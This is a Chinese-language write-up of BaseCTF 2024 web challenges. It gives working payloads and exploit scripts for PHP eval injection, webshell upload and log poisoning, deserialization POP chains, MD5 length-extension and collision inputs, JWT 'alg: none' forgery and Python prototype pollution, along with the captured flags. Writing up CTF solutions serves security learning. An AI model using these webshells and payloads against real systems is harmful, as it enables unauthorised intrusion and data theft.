A Dark Room
直接查看源代码,注释里有flag
HTTP是什么呀
bp
抓包改http
参数
POST /?basectf=we1c%2500me HTTP/1.1
Host: challenge.basectf.fun:33834
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
X-Forwarded-For:127.0.0.1
Referer:Base
User-Agent:Base
Cookie:c00k13=i can't eat it
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 9
Base=fl@g
会得到以下内容,base64
解码即可
HTTP/1.1 302 Found
Server: nginx/1.18.0
Date: Thu, 15 Aug 2024 07:05:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.4.27
Location: success.php?flag=QmFzZUNURns1N2Y2MGNlYi00Y2UxLTQ5Y2UtYjNhMC0xMTc3NTliODhkNmZ9Cg==
Content-Length: 0
客户端重定向:
- 服务器在响应中返回一个带有302状态码的响应头,指示浏览器进行跳转。
- 例如,服务器端脚本通过
header("Location: success.php?flag=QmFzZUNURns1N2Y2MGNlYi00Y2UxLTQ5Y2UtYjNhMC0xMTc3NTliODhkNmZ9Cg==");
指令将HTTP响应状态设置为302,然后浏览器会自动访问success.php?flag=QmFzZUNURns1N2Y2MGNlYi00Y2UxLTQ5Y2UtYjNhMC0xMTc3NTliODhkNmZ9Cg==
页面。
喵喵喵
<?php
highlight_file(__FILE__);
error_reporting(0);
$a = $_GET['DT'];
eval($a);
?>
get
传参给eval
执行,直接传system('cat /flag');
,即url?DT=system('cat /flag');
EncirclingGame
A simple game, enjoy it and get the flag when you complete it.
纯游戏题,通关得到flag
upload
文件上传漏洞,没有检测文件类型,直接传个木马,然后蚁剑连接
test.php
:
<?php @eval($_POST['pass']);?>
Aura酱的礼物
data
伪协议 ssrf
文件包含
<?php
highlight_file(__FILE__);
// Aura 酱,欢迎回家~
// 这里有一份礼物,请你签收一下哟~
$pen = $_POST['pen'];
if (file_get_contents($pen) !== 'Aura')
{
die('这是 Aura 的礼物,你不是 Aura!');
}
// 礼物收到啦,接下来要去博客里面写下感想哦~
$challenge = $_POST['challenge'];
if (strpos($challenge, 'http://jasmineaura.github.io') !== 0)
{
die('这不是 Aura 的博客!');
}
$blog_content = file_get_contents($challenge);
if (strpos($blog_content, '已经收到Kengwang的礼物啦') === false)
{
die('请去博客里面写下感想哦~');
}
// 嘿嘿,接下来要拆开礼物啦,悄悄告诉你,礼物在 flag.php 里面哦~
$gift = $_POST['gift'];
include($gift);
post
参数:pen=data://text/plain,Aura&challenge=http://jasmineaura.github.io@challenge.basectf.fun:21758/&gift=php://filter/convert.base64-encode/resource=flag.php
一起吃豆豆
index.js
里有一行context.fillText(_LIFE ? atob("QmFzZUNURntKNV9nYW0zXzFzX2Vhc3lfdDBfaDRjayEhfQ==") : 'GAME OVER', this.x, this.y);,base64
解码得到flag
你听不到我的声音
系统命令执行,不会直接显示,所以放到其他文件里再访问文件:cmd=cat /flag > ./1.txt
shell_exec($_POST['cmd']);
easy_ser
源码
<?php
highlight_file(__FILE__);
error_reporting(0);
class re{
public $chu0;
public function __toString(){
if(!isset($this->chu0)){
return "I can not believes!";
}
$this->chu0->$nononono;
}
}
class web {
public $kw;
public $dt;
public function __wakeup() {
echo "lalalla".$this->kw;
}
public function __destruct() {
echo "ALL Done!";
}
}
class pwn {
public $dusk;
public $over;
public function __get($name) {
if($this->dusk != "gods"){
echo "什么,你竟敢不认可?";
}
$this->over->getflag();
}
}
class Misc {
public $nothing;
public $flag;
public function getflag() {
eval("system('cat /flag');");
}
}
class Crypto {
public function __wakeup() {
echo "happy happy happy!";
}
public function getflag() {
echo "you are over!";
}
}
$ser = $_GET['ser'];
unserialize($ser);
?>
exp
<?php
class re{
public $chu0;
public function __toString(){
if(!isset($this->chu0)){
return "I can not believes!";
}
$this->chu0->$nononono;
}
}
class web {
public $kw;
public $dt;
public function __wakeup() {
echo "lalalla".$this->kw;
}
public function __destruct() {
echo "ALL Done!";
}
}
class pwn {
public $dusk;
public $over;
public function __get($name) {
if($this->dusk != "gods"){
echo "什么,你竟敢不认可?";
}
$this->over->getflag();
}
}
class Misc {
public $nothing;
public $flag;
public function getflag() {
echo "getflag";
}
}
$re = new re();
$pwn = new pwn();
$web = new web();
$misc = new Misc();
$pwn->dusk = "gods";
$pwn->over = $misc;
$re->chu0 = $pwn;
$web->kw = $re;
$res = serialize($web);
echo $res;
最终构造:O:3:"web":2:{s:2:"kw";O:2:"re":1:{s:4:"chu0";O:3:"pwn":2:{s:4:"dusk";s:4:"gods";s:4:"over";O:4:"Misc":2:{s:7:"nothing";N;s:4:"flag";N;}}}s:2:"dt";N;}
RCEisamazingwithspace
绕过空格:cmd=cat${IFS}/flag
Really EZ POP
源码
<?php
highlight_file(__FILE__);
class Sink
{
private $cmd = 'echo 123;';
public function __toString()
{
eval($this->cmd);
}
}
class Shark
{
private $word = 'Hello, World!';
public function __invoke()
{
echo 'Shark says:' . $this->word;
}
}
class Sea
{
public $animal;
public function __get($name)
{
$sea_ani = $this->animal;
echo 'In a deep deep sea, there is a ' . $sea_ani();
}
}
class Nature
{
public $sea;
public function __destruct()
{
echo $this->sea->see;
}
}
if ($_POST['nature']) {
$nature = unserialize($_POST['nature']);
}
exp
<?php
class Sink
{
private $cmd = 'echo 123;';
public function setPrivateVar($res) {
$this->cmd = $res;
}
public function __toString()
{
eval($this->cmd);
}
}
class Shark
{
private $word = 'Hello, World!';
public function setPrivateVar($res) {
$this->word = $res;
}
public function __invoke()
{
echo 'Shark says:' . $this->word;
}
}
class Sea
{
public $animal;
public function __get($name)
{
$sea_ani = $this->animal;
echo 'In a deep deep sea, there is a ' . $sea_ani();
}
}
class Nature
{
public $sea;
public function __destruct()
{
echo $this->sea->see;
}
}
$Sink = new Sink();
$Nature = new Nature();
$Sea = new Sea();
$Shark = new Shark();
$Sink->setPrivateVar("system('cat /flag');");
$Nature->sea = $Sea;
$Sea->animal = $Shark;
$Shark->setPrivateVar($Sink);
$res = serialize($Nature);
echo $res;
发过去的序列化内容要在私有类的类名和属性名前加\x00
,最终发送nature=O:6:"Nature":1:{s:3:"sea";O:3:"Sea":1:{s:6:"animal";O:5:"Shark":1:{s:11:"%00Shark%00word";O:4:"Sink":1:{s:9:"%00Sink%00cmd";s:20:"system('cat /flag');";}}}}
关于非公有字段名称:
private
使用: 私有的类的名称 (考虑到继承的情况) 和字段名组合\x00类名称\x00字段名
protected
使用:*
和字段名组合\x00*\x00字段名
数学大师
从网页利用正则获取算数式然后post加answer参数发过去,需要开启session cookie
import requests
import re
def extract_and_calculate(expression):
pattern = r'(\d+)\s*([+\-*/÷×]+)\s*(\d+)'
match = re.search(pattern, expression)
if match:
num1, operator, num2 = match.groups()
operator = operator.replace('÷', '/').replace('×', '*')
python_expression = f"{num1} {operator} {num2}"
try:
result = eval(python_expression)
return result
except Exception as e:
return f"Error in calculation: {str(e)}"
else:
return "No valid expression found."
session = requests.Session()
url = 'http://challenge.basectf.fun:29707'
response = session.get(url).text
for i in range(50):
res = int(extract_and_calculate(response))
post_data = {
'answer': res
}
response = session.post(url, data=post_data).text
print(response)
所以你说你懂md5?
利用hash-ext-attack
工具进行哈希长度扩展
python3 hash_ext_attack.py
2024-09-10 20:53:46.493 | DEBUG | common.md5_manual:__init__:17 - init......
请输入已知明文:
请输入已知hash: 82cb3db8069266aecdc0d3cdabb4b460
请输入扩展字符: admin
请输入密钥长度:96
2024-09-10 20:53:52.093 | INFO | common.HashExtAttack:run:65 - 已知明文:b''
2024-09-10 20:53:52.093 | INFO | common.HashExtAttack:run:66 - 已知hash:b'82cb3db8069266aecdc0d3cdabb4b460'
2024-09-10 20:53:52.093 | INFO | common.HashExtAttack:run:68 - 新明文:b'\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00admin'
2024-09-10 20:53:52.093 | INFO | common.HashExtAttack:run:69 - 新明文(url编码):%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%03%00%00%00%00%00%00admin
2024-09-10 20:53:52.093 | INFO | common.HashExtAttack:run:71 - 新hash:e7e7b8375abc6096501a68bbd0e3f662
发送http内容
POST / HTTP/1.1
Host: challenge.basectf.fun:49521
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Cookie:PHPSESSID=1gtcjs8kgqmltafgpn6cncugfv
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 522
apple[]=24&banana[]=2&appple=240610708&bananana=QNKCDZO&banananana=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2&apppple=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&name=%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%03%00%00%00%00%00%00admin&md5=e7e7b8375abc6096501a68bbd0e3f662
flag直接读取不就行了?
php
原生类的利用
<?php
highlight_file('index.php');
# 我把flag藏在一个secret文件夹里面了,所以要学会遍历啊~
error_reporting(0);
$J1ng = $_POST['J'];
$Hong = $_POST['H'];
$Keng = $_GET['K'];
$Wang = $_GET['W'];
$dir = new $Keng($Wang);
foreach($dir as $f) {
echo($f . '<br>');
}
echo new $J1ng($Hong);
?>
访问http://challenge.basectf.fun:27459/?K=DirectoryIterator&W=/
,发现根目录下有secret
,访问http://challenge.basectf.fun:27459/?K=DirectoryIterator&W=/secret
发现f11444g.php
,发送post
请求
J=SplFileObject&H=/secret/f11444g.php
网页看不到,直接查看源代码
</code>.<br>..<br>f11444g.php<br><?php BaseCTF{640a9b0d-3b98-4d44-8164-a1113b9ec49f} ?>
滤个不停
文件
<?php
highlight_file(__FILE__);
error_reporting(0);
$incompetent = $_POST['incompetent'];
$Datch = $_POST['Datch'];
if ($incompetent !== 'HelloWorld') {
die('写出程序员的第一行问候吧!');
}
//这是个什么东东???
$required_chars = ['s', 'e', 'v', 'a', 'n', 'x', 'r', 'o'];
$is_valid = true;
foreach ($required_chars as $char) {
if (strpos($Datch, $char) === false) {
$is_valid = false;
break;
}
}
if ($is_valid) {
$invalid_patterns = ['php://', 'http://', 'https://', 'ftp://', 'file://' , 'data://', 'gopher://'];
foreach ($invalid_patterns as $pattern) {
if (stripos($Datch, $pattern) !== false) {
die('此路不通换条路试试?');
}
}
include($Datch);
} else {
die('文件名不合规 请重试');
}
?>
payload:incompetent=HelloWorld&Datch=/var/log/nginx/access.log,user agent中添加<?php @eval($_POST['pass']);?>
访问/var/log/nginx/access.log
发送incompetent=HelloWorld&Datch=/var/log/nginx/access.log&pass=system('cat /flag');
得到
10.32.0.0 - - [13/Sep/2024:00:20:54 +0800] "GET / HTTP/1.1" 502 559 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:20:55 +0800] "GET /favicon.ico HTTP/1.1" 200 5478 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:20:58 +0800] "GET / HTTP/1.1" 200 5472 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:20:58 +0800] "GET /favicon.ico HTTP/1.1" 200 5472 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:21:02 +0800] "GET /%3C?php%20phpinfo();?%3E HTTP/1.1" 200 5478 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:21:02 +0800] "GET /favicon.ico HTTP/1.1" 200 5472 "http://challenge.basectf.fun:30015/%3C?php%20phpinfo();?%3E" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:24:36 +0800] "GET / HTTP/1.1" 200 5472 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:24:37 +0800] "GET /favicon.ico HTTP/1.1" 200 5472 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:26:13 +0800] "GET / HTTP/1.1" 200 5472 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27" "-" 10.32.0.0 - - [13/Sep/2024:00:27:12 +0800] "POST / HTTP/1.1" 200 7391 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:27:13 +0800] "GET /favicon.ico HTTP/1.1" 200 5478 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:27:26 +0800] "POST / HTTP/1.1" 200 5467 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:27:27 +0800] "GET /favicon.ico HTTP/1.1" 200 5472 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:27:30 +0800] "POST / HTTP/1.1" 200 8321 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:27:31 +0800] "GET /favicon.ico HTTP/1.1" 200 5478 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:28:08 +0800] "GET /favicon.ico HTTP/1.1" 200 5478 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)" "-" 10.32.0.0 - - [13/Sep/2024:00:28:32 +0800] "POST / HTTP/1.1" 200 8935 "http://challenge.basectf.fun:30015/" "BaseCTF{a0fd8763-8a3b-4bc5-b430-f09a213482e3} " "-" 10.32.0.0 - - [13/Sep/2024:00:28:33 +0800] "GET /favicon.ico HTTP/1.1" 200 5478 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:30:27 +0800] "POST / HTTP/1.1" 200 9332 "http://challenge.basectf.fun:30015/" "BaseCTF{a0fd8763-8a3b-4bc5-b430-f09a213482e3} " "-" 10.32.0.0 - - [13/Sep/2024:00:30:28 +0800] "GET /favicon.ico HTTP/1.1" 200 5472 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:30:43 +0800] "GET / HTTP/1.1" 200 5478 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)" "-" 10.32.0.0 - - [13/Sep/2024:00:30:46 +0800] "\x16\x03\x01\x00\xD2\x01\x00\x00\xCE\x03\x03\xC25 \xAE\x14'\xE9\x9C\x84\xF1\xB3\xDD\xE3\x09h\x98.\x10\x86\x16\xECn4\x10\xE7\xB3!r\xBA\x1BB\xA2\x00\x00b\xC00\xC0,\xC0/\xC0+\x00\x9F\x00\x9E\xC02\xC0.\xC01\xC0-\x00\xA5\x00\xA1\x00\xA4\x00\xA0\xC0(\xC0$\xC0\x14\xC0" 400 157 "-" "-" "-"
no jwt
源码
from flask import Flask, request, jsonify
import jwt
import datetime
import os
import random
import string
app = Flask(__name__)
# 随机生成 secret_key
app.secret_key = ''.join(random.choices(string.ascii_letters + string.digits, k=16))
# 登录接口
@app.route('/login', methods=['POST'])
def login():
data = request.json
username = data.get('username')
password = data.get('password')
# 其他用户都给予 user 权限
token = jwt.encode({
'sub': username,
'role': 'user', # 普通用户角色
'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=1)
}, app.secret_key, algorithm='HS256')
return jsonify({'token': token}), 200
# flag 接口
@app.route('/flag', methods=['GET'])
def flag():
token = request.headers.get('Authorization')
if token:
try:
decoded = jwt.decode(token.split(" ")[1], options={"verify_signature": False, "verify_exp": False})
# 检查用户角色是否为 admin
if decoded.get('role') == 'admin':
with open('/flag', 'r') as f:
flag_content = f.read()
return jsonify({'flag': flag_content}), 200
else:
return jsonify({'message': 'Access denied: admin only'}), 403
except FileNotFoundError:
return jsonify({'message': 'Flag file not found'}), 404
except jwt.ExpiredSignatureError:
return jsonify({'message': 'Token has expired'}), 401
except jwt.InvalidTokenError:
return jsonify({'message': 'Invalid token'}), 401
return jsonify({'message': 'Token is missing'}), 401
if __name__ == '__main__':
app.run(debug=True)
向login
中发送post
数据得到token
验证后的jwt
格式,把role
改成admin
生成jwt token
import jwt # 导入 PyJWT 包
# payload
token_dict = {
"sub": "admin", # 使用 None 而不是 null
"role": "admin",
}
headers = {
"alg": "none",
"typ": "JWT"
}
# 使用 PyJWT 的 encode 方法
jwt_token = jwt.encode(token_dict, "", algorithm="none", headers=headers)
print(jwt_token)
以Bearer
方案发送认证数据
import requests
# 假设你已经有了一个JWT
jwt_token = 'eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.'
# 目标URL
url = 'http://challenge.basectf.fun:27209/flag'
# 发送GET请求,将JWT放在Authorization头部中
response = requests.get(url, headers={'Authorization': f'Bearer {jwt_token}'})
# 检查响应
if response.status_code == 200:
print('Success:', response.json())
else:
print('Error:', response.status_code, response.text)
back to the future
githacker
得到git
源码直接git show
圣钥之战
提升可以去read
那里找一下flag
,访问/read
拿到源码
from flask import Flask,request
import json
app = Flask(__name__)
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
def is_json(data):
try:
json.loads(data)
return True
except ValueError:
return False
class cls():
def __init__(self):
pass
instance = cls()
@app.route('/', methods=['GET', 'POST'])
def hello_world():
return open('/static/index.html', encoding="utf-8").read()
@app.route('/read', methods=['GET', 'POST'])
def Read():
file = open(__file__, encoding="utf-8").read()
return f"J1ngHong说:你想read flag吗?
那么圣钥之光必将阻止你!
但是小小的源码没事,因为你也读不到flag(乐)
{file}
"
@app.route('/pollute', methods=['GET', 'POST'])
def Pollution():
if request.is_json:
merge(json.loads(request.data),instance)
else:
return "J1ngHong说:钥匙圣洁无暇,无人可以污染!"
return "J1ngHong说:圣钥暗淡了一点,你居然污染成功了?"
if __name__ == '__main__':
app.run(host='0.0.0.0',port=80)
python
原型链污染__file__
为flag
,发送post
数据
{"__init__":{"__globals__":{"__file__":"/flag"}}}
玩原神玩的
源码
<?php
highlight_file(__FILE__);
error_reporting(0);
include 'flag.php';
if (sizeof($_POST['len']) == sizeof($array)) {
ys_open($_GET['tip']);
} else {
die("错了!就你还想玩原神?❌❌❌");
}
function ys_open($tip) {
if ($tip != "我要玩原神") {
die("我不管,我要玩原神!😭😭😭");
}
dumpFlag();
}
function dumpFlag() {
if (!isset($_POST['m']) || sizeof($_POST['m']) != 2) {
die("可恶的QQ人!😡😡😡");
}
$a = $_POST['m'][0];
$b = $_POST['m'][1];
if(empty($a) || empty($b) || $a != "100%" || $b != "love100%" . md5($a)) {
die("某站崩了?肯定是某忽悠干的!😡😡😡");
}
include 'flag.php';
$flag[] = array();
for ($ii = 0;$ii < sizeof($array);$ii++) {
$flag[$ii] = md5(ord($array[$ii]) ^ $ii);
}
echo json_encode($flag);
}
len
数组的长度要和array
一样,爆破array
的长度为45
,源码给出了m
数组的内容
最后得到flag
的数组,每一位进行md5
,直接爆破md5
php
的数组:len[]=0&len[]=1&len[]=2&len[]=3&len[]=4
(拼接
爆破md5
import hashlib
md5_array = ["3295c76acbf4caaed33c36b1b5fc2cb1","26657d5ff9020d2abefe558796b99584","73278a4a86960eeb576a8fd4c9ec6997","ec8956637a99787bd197eacd77acce5e","e2c420d928d4bf8ce0ff2ec19b371514","43ec517d68b6edd3015b3edc9a11367b","ea5d2f1c4608232e07d3aa3d998e5135","c8ffe9a587b126f152ed3d89a146b445","072b030ba126b2f4b2374f342be9ed44","c9e1074f5b3f9fc8ea15d152add07294","093f65e080a295f8076b1c5722a46aa2","66f041e16a60928b05a7e228a89c3799","9f61408e3afb633e50cdf1b20de6f466","9a1158154dfa42caddbd0694a4e9bdc8","9f61408e3afb633e50cdf1b20de6f466","a684eceee76fc522773286a895bc8436","7f39f8317fbdb1988ef4c628eba02591","eb160de1de89d9058fcb0b968dbbbd68","c45147dee729311ef5b5c3003946c48f","7f6ffaa6bb0b408017b62254211691b5","07e1cd7dca89a1678042477183b7ac3f","9f61408e3afb633e50cdf1b20de6f466","e369853df766fa44e1ed0ff613f563bd","5ef059938ba799aaa845e1c2e8a762bd","a1d0c6e83f027327d8461063f4ac58a6","a1d0c6e83f027327d8461063f4ac58a6","b53b3a3d6ab90ce0268229151c9bde11","a0a080f42e6f13b3a2df133f073095dd","17e62166fc8586dfa4d1bc0e1742c08b","3416a75f4cea9109507cacd8e2f2aefc","a5771bce93e200c36f7cd9dfd0e5deaa","c0c7c76d30bd3dcaefc96f40275bdc0a","a3f390d88e4c41f2747bfa2f1b5f87db","6f4922f45568161a8cdf4ad2299f6d23","98f13708210194c475687be6106a3b84","37693cfc748049e45d87b8c7d8b9aacd","7cbbc409ec990f19c78c75bd1e06f215","1f0e3dad99908345f7439f8ffabdffc4","34173cb38f07f89ddbebc2ac9128303f","70efdf2ec9b086079795c442636b55fb","35f4a8d465e6e1edc05f3d8ab658c551","02e74f10e0327ad868d138f2b4fdd6f0","d1fe173d08e959397adf34b1d77e88d7","1f0e3dad99908345f7439f8ffabdffc4","43ec517d68b6edd3015b3edc9a11367b"]
flag = ''
for index, i in enumerate(md5_array):
for j in range(256):
if hashlib.md5(str(j ^ index).encode()).hexdigest() == i:
flag += chr(j)
print(flag)
ez_php_jail
源码
<?php
highlight_file(__FILE__);
error_reporting(0);
include("hint.html");
$Jail = $_GET['Jail_by.Happy'];
if($Jail == null) die("Do You Like My Jail?");
function Like_Jail($var) {
if (preg_match('/(`|\$|a|c|s|require|include)/i', $var)) {
return false;
}
return true;
}
if (Like_Jail($Jail)) {
eval($Jail);
echo "Yes! you escaped from the jail! LOL!";
} else {
echo "You will Jail in your life!";
}
echo "\n";
// 在HTML解析后再输出PHP源代码
?>
执行hightlight_file
利用glob
进行通配符查找